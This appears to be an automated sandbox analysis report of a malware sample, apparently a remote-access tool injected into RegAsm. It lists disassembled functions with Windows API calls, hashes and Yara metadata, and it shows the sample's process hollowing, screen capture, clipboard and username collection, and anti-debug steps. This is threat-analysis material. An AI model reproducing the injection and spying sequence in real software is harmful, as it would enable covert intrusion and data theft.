                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                        • String ID:
                                                        • API String ID: 2829624132-0
                                                        • Opcode ID: 17aaed6ea9cf6127563f26f501199b73ece46ecde5b2d8f8ea879c6fa7cd1fbc
                                                        • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                        • Opcode Fuzzy Hash: 17aaed6ea9cf6127563f26f501199b73ece46ecde5b2d8f8ea879c6fa7cd1fbc
                                                        • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                        Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                        • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                        • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                        • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                        Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID:
                                                        • API String ID: 1815803762-0
                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                        Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseDataOpen
                                                        • String ID:
                                                        • API String ID: 2058664381-0
                                                        • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                        • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                        • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                        • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                        Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-3916222277
                                                        • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                        • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                        • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                        • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                        Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                        • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                        • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                        • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                        Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: JD
                                                        • API String ID: 1084509184-2669065882
                                                        • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                        • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                        • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                        • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                        Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: GetLocaleInfoEx
                                                        • API String ID: 2299586839-2904428671
                                                        • Opcode ID: e3a58a4a2a83d15128b091247adc82563cd448b1edafce75d8cd2e0e094fdf84
                                                        • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                        • Opcode Fuzzy Hash: e3a58a4a2a83d15128b091247adc82563cd448b1edafce75d8cd2e0e094fdf84
                                                        • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                        Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                        • String ID:
                                                        • API String ID: 1661935332-0
                                                        • Opcode ID: 99cd805ed4c2df00003a48f1a6811e4fd7c7d64455718b3e19dbc584044dc3e8
                                                        • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                        • Opcode Fuzzy Hash: 99cd805ed4c2df00003a48f1a6811e4fd7c7d64455718b3e19dbc584044dc3e8
                                                        • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                        Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                        • HeapFree.KERNEL32(00000000), ref: 00412129
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$FreeProcess
                                                        • String ID:
                                                        • API String ID: 3859560861-0
                                                        • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                        • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                        • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                        • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                        Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                        • String ID:
                                                        • API String ID: 1663032902-0
                                                        • Opcode ID: 92b4d6e99215bbe04ae581cd80a63159ab80ee2b3c46d7f2f4da99747f448a1f
                                                        • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                        • Opcode Fuzzy Hash: 92b4d6e99215bbe04ae581cd80a63159ab80ee2b3c46d7f2f4da99747f448a1f
                                                        • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                        Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                        • String ID:
                                                        • API String ID: 2692324296-0
                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                        Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                        • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                        • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                        • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                        Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                        • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                        • String ID:
                                                        • API String ID: 1272433827-0
                                                        • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                        • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                        • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                        • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                        Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID:
                                                        • API String ID: 1084509184-0
                                                        • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                        • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                        • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                        • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                        Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID:
                                                        • API String ID: 2299586839-0
                                                        • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                        • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                        Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                          • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                        • DeleteDC.GDI32(00000000), ref: 00418F68
                                                        • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                        • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                        • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                        • GetIconInfo.USER32 ref: 00418FF8
                                                        • DeleteObject.GDI32(?), ref: 00419027
                                                        • DeleteObject.GDI32(?), ref: 00419034
                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                        • DeleteDC.GDI32(?), ref: 004191B7
                                                        • DeleteDC.GDI32(00000000), ref: 004191BA
                                                        • DeleteObject.GDI32(00000000), ref: 004191BD
                                                        • GlobalFree.KERNEL32(?), ref: 004191C8
                                                        • DeleteObject.GDI32(00000000), ref: 0041927C
                                                        • GlobalFree.KERNEL32(?), ref: 00419283
                                                        • DeleteDC.GDI32(?), ref: 00419293
                                                        • DeleteDC.GDI32(00000000), ref: 0041929E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                        • String ID: DISPLAY
                                                        • API String ID: 479521175-865373369
                                                        • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                        • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                        • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                        • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                        Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                        • ResumeThread.KERNEL32(?), ref: 00418470
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                        • GetLastError.KERNEL32 ref: 004184B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                        • API String ID: 4188446516-3035715614
                                                        • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                        • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                        • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                        • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                        Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                        • ExitProcess.KERNEL32 ref: 0040D80B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
